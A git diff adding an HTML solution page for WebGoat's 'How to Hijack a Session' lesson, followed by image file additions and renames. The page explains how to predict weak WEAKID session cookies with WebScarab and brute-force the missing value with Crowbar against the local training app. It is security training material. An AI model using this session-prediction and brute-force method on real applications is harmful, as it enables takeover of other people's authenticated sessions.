+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+h2
+	{mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 2 Char";
+	mso-style-next:Normal;
+	margin-top:10.0pt;
+	margin-right:0cm;
+	margin-bottom:0cm;
+	margin-left:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan lines-together;
+	page-break-after:avoid;
+	mso-outline-level:2;
+	font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-margin-top-alt:auto;
+	margin-right:0cm;
+	mso-margin-bottom-alt:auto;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.Heading2Char
+	{mso-style-name:"Heading 2 Char";
+	mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 2";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:612.0pt 792.0pt;
+	margin:72.0pt 72.0pt 72.0pt 72.0pt;
+	mso-header-margin:35.4pt;
+	mso-footer-margin:35.4pt;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="3074"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Lesson
+Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> How to
+Hijack a Session<o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
+Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<!-- Start Instructions -->
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Application
+developers who develop their own session IDs frequently forget to incorporate
+the complexity and randomness necessary for security. If the user specific
+session ID is not complex and random, then the application is highly
+susceptible to session-based brute force attacks. <o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
+Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Try to access
+an authenticated session belonging to someone else. <o:p></o:p></span></p>
+
+<!-- Stop Instructions -->
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>In this
+lesson the purpose is to predict the WEAKID value. The WEAKID is used to
+differentiate authenticated and anonymous users of WebGoat.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
+yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600"
+ o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f"
+ stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_785" o:spid="_x0000_i1034" type="#_x0000_t75"
+ style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="lesson_solutions/WeakSessionID_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="lesson_solutions/WeakSessionID_files/image020.jpg" v:shapes="Picture_x0020_785"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Solution:</span></b><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The easiest
+way to complete this lesson is to use WebScarab's Session ID Analysis.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Go to
+WebScarab and click on the button "SessionID Analysis". Select the last POST
+request from the "Previous requests" drop-down box.<o:p></o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_786"
+ o:spid="_x0000_i1033" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="lesson_solutions/WeakSessionID_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="lesson_solutions/WeakSessionID_files/image021.jpg" v:shapes="Picture_x0020_786"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> WebScarabs SessionID Analysis<span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>To make sure
+that WebScarab is able to fetch the WEAKID cookie, you need to click the "Test"
+button on the bottom of the screen. A pop-up window must be shown like below.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_787"
+ o:spid="_x0000_i1032" type="#_x0000_t75" style='width:480pt;height:276pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="lesson_solutions/WeakSessionID_files/image005.png" o:title="" cropbottom="2719f"/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=368
+src="lesson_solutions/WeakSessionID_files/image022.jpg" v:shapes="Picture_x0020_787"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> SessionID WEAKID discovered<span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>If you don’t
+have a pop-up window with the Extracted Sessionids, you must edit the Request.
+You must delete the WEAKID value from the request. Without this cookie value,
+WebGoat will return a HTTP Header "Set-Cookie: WEAKID=value" so WebScarab
+learns about this value.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Fetch 50
+samples and examine the results. Enter "50" in the "Samples" window and click
+the button "Fetch". You will not see any information about progress.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_788" o:spid="_x0000_i1031"
+ type="#_x0000_t75" style='width:480pt;height:17.25pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="lesson_solutions/WeakSessionID_files/image007.png" o:title="" croptop="61471f"/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=23
+src="lesson_solutions/WeakSessionID_files/image023.jpg" v:shapes="Picture_x0020_788"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Now you need
+to go to the tab "Analysis".<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_789" o:spid="_x0000_i1030"
+ type="#_x0000_t75" style='width:480pt;height:53.25pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="lesson_solutions/WeakSessionID_files/image007.png" o:title="" cropbottom="52914f"/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=71
+src="lesson_solutions/WeakSessionID_files/image024.jpg" v:shapes="Picture_x0020_789"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>In the "Analysis"
+pane you see nothing. <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_790" o:spid="_x0000_i1029"
+ type="#_x0000_t75" style='width:480pt;height:276.75pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="lesson_solutions/WeakSessionID_files/image010.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="lesson_solutions/WeakSessionID_files/image025.jpg" v:shapes="Picture_x0020_790"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>You must
+select the Session Identifier WEAKID value from the drop-down box.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_791" o:spid="_x0000_i1028"
+ type="#_x0000_t75" style='width:480pt;height:276.75pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="lesson_solutions/WeakSessionID_files/image012.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="lesson_solutions/WeakSessionID_files/image026.jpg" v:shapes="Picture_x0020_791"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The WEAKID is
+divided in 2 parts: the first part is an identifier that is added 1 in every
+cookie and a time value. The time value is calculated at the moment that you
+submit the request.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Notice that
+there is sometimes a gap in the first value of the WEAKID, skipping with 1. The
+value that is missing is the value that you need to know to log on. Now you
+only need to calculate the timestamp. This can be brute-forced using Crowbar.
+You know the previous timestamp and the next timestamp so you have a start and
+end value.<br>
+You can download Crowbar for free: <a href="http://www.sensepost.com/research/crowbar/" target="_blank">http://www.sensepost.com/research/crowbar/</a>
+<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_792" o:spid="_x0000_i1027"
+ type="#_x0000_t75" style='width:480.75pt;height:338.25pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="lesson_solutions/WeakSessionID_files/image014.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=641 height=451
+src="lesson_solutions/WeakSessionID_files/image027.jpg" v:shapes="Picture_x0020_792"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>There is a
+value 16935 and a value 16937 with a numeric difference of 28110 instead of
+14109, so there the WEAKID cookie is located. Copy and paste the raw HTTP
+request in Crowbar:<o:p></o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_793"
+ o:spid="_x0000_i1026" type="#_x0000_t75" style='width:447pt;height:382.5pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="lesson_solutions/WeakSessionID_files/image016.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=596 height=510
+src="lesson_solutions/WeakSessionID_files/image028.jpg" v:shapes="Picture_x0020_793"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>3</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Crowbar<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Change target
+to localhost and adjust the port.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Create a Base
+response. Make sure that you see "How to hijack a session" in the middle
+window.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Insert ##1##
+in the WEAKID parameter where you want to brute-force the value and be aware, that the first part of the WEAKID is the one we are searching for (16936).
+The WEAKID in Crowbar lookes like this: Cookie: JSESSIONID=...; WEAKID=1693<font color="ff0000">6</font>-1163685<font color="ff0000">##1##</font>;<br>
+Start the first loop at 363093, the last digits of the last cookie before the
+authentication cookie and 363203, the first cookie after the authentication
+cookie. You have to enter these two values in the Parameter1 fields. We have to brute-force these values, but we are sure that they lie
+between these two boundaries.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Examine the
+results until you see a different fuzzy logic value (the blue line in Figure 3), right-click it and click on "Show
+reply".<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_794"
+ o:spid="_x0000_i1025" type="#_x0000_t75" style='width:481.5pt;height:345.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="lesson_solutions/WeakSessionID_files/image018.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=642 height=461
+src="lesson_solutions/WeakSessionID_files/image029.jpg" v:shapes="Picture_x0020_794"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>4</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson 12 Completed<span style='font-family:
+"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image001.jpg b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image001.jpg
new file mode 100644
index 000000000..7309a0035
Binary files /dev/null and b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image001.jpg differ
diff --git a/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image002.jpg b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image002.jpg
new file mode 100644
index 000000000..3b442cc42
Binary files /dev/null and b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image002.jpg differ
diff --git a/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image003.jpg b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image003.jpg
new file mode 100644
index 000000000..21ce9ef3d
Binary files /dev/null and b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image003.jpg differ
diff --git a/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image004.jpg b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image004.jpg
new file mode 100644
index 000000000..52b78aaca
Binary files /dev/null and b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image004.jpg differ
diff --git a/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image005.jpg b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image005.jpg
new file mode 100644
index 000000000..bbc01ffc1
Binary files /dev/null and b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image005.jpg differ
diff --git a/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image006.jpg b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image006.jpg
new file mode 100644
index 000000000..27ca4296d
Binary files /dev/null and b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image006.jpg differ
diff --git a/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/colorschememapping.xml b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/colorschememapping.xml
similarity index 100%
rename from webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/colorschememapping.xml
rename to webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/colorschememapping.xml
diff --git a/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/filelist.xml b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/filelist.xml
similarity index 100%
rename from webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/filelist.xml
rename to webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/filelist.xml
diff --git a/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image001.png b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image001.png
similarity index 100%
rename from webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image001.png
rename to webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image001.png
diff --git a/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image003.png b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image003.png
similarity index 100%
rename from webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image003.png
rename to webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image003.png
diff --git a/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image005.png b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image005.png
similarity index 100%
rename from webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image005.png
rename to webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image005.png
diff --git a/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image007.png b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image007.png
similarity index 100%
rename from webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image007.png
rename to webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image007.png
diff --git a/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image010.png b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image010.png
similarity index 100%
rename from webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image010.png
rename to webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image010.png
diff --git a/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image012.png b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image012.png
similarity index 100%
rename from webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image012.png
rename to webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image012.png
diff --git a/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image014.png b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image014.png
similarity index 100%
rename from webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image014.png
rename to webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image014.png
diff --git a/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image016.png b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image016.png
similarity index 100%
rename from webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image016.png
rename to webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image016.png
